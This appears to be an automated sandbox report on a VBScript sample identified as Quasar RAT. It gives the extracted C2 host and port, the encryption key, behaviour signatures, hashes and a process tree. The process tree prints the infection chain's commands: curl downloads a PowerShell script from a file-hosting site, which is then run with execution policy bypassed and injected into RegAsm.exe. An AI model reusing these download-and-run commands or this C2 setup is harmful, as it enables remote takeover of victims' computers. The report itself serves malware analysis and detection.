Analysis

  • max time kernel
    160s
  • max time network
    208s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/01/2023, 07:46

General

  • Target

    vb.vbs

  • Size

    1024KB

  • MD5

    ea33785b5feaade952b2768dc1b74d6d

  • SHA1

    2611ef2ca512873963550e03e8da3761a3f827da

  • SHA256

    664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82

  • SHA512

    63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35

  • SSDEEP

    12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\system32\cmd.exe
        cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4780
        • C:\Windows\system32\curl.exe
          curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
           PID:4792
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\system32\cmd.exe
          cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4628
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1644

    Downloads

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      7aad8bcb11ff3deab23cc311222fe265

      SHA1

      3d9a69c71e00aff947af949441220f18bad9e0d8

      SHA256

      c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a

      SHA512

      f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

    • memory/1644-150-0x00000000075A0000-0x0000000007606000-memory.dmp

      Filesize

      408KB

    • memory/1644-149-0x00000000062E0000-0x0000000006392000-memory.dmp

      Filesize

      712KB

    • memory/1644-148-0x0000000005860000-0x00000000058B0000-memory.dmp

      Filesize

      320KB

    • memory/1644-147-0x00000000066D0000-0x0000000006CE8000-memory.dmp

      Filesize

      6.1MB

    • memory/1644-146-0x00000000052E0000-0x00000000052EA000-memory.dmp

      Filesize

      40KB

    • memory/1644-145-0x0000000005350000-0x00000000053E2000-memory.dmp

      Filesize

      584KB

    • memory/1644-144-0x0000000005900000-0x0000000005EA4000-memory.dmp

      Filesize

      5.6MB

    • memory/1644-141-0x0000000000400000-0x0000000000484000-memory.dmp

      Filesize

      528KB

    • memory/4628-143-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

      Filesize

      10.8MB

    • memory/4628-140-0x00007FFB92CC0000-0x00007FFB93781000-memory.dmp

      Filesize

      10.8MB

    • memory/4628-138-0x0000019043090000-0x00000190430B2000-memory.dmp

      Filesize

      136KB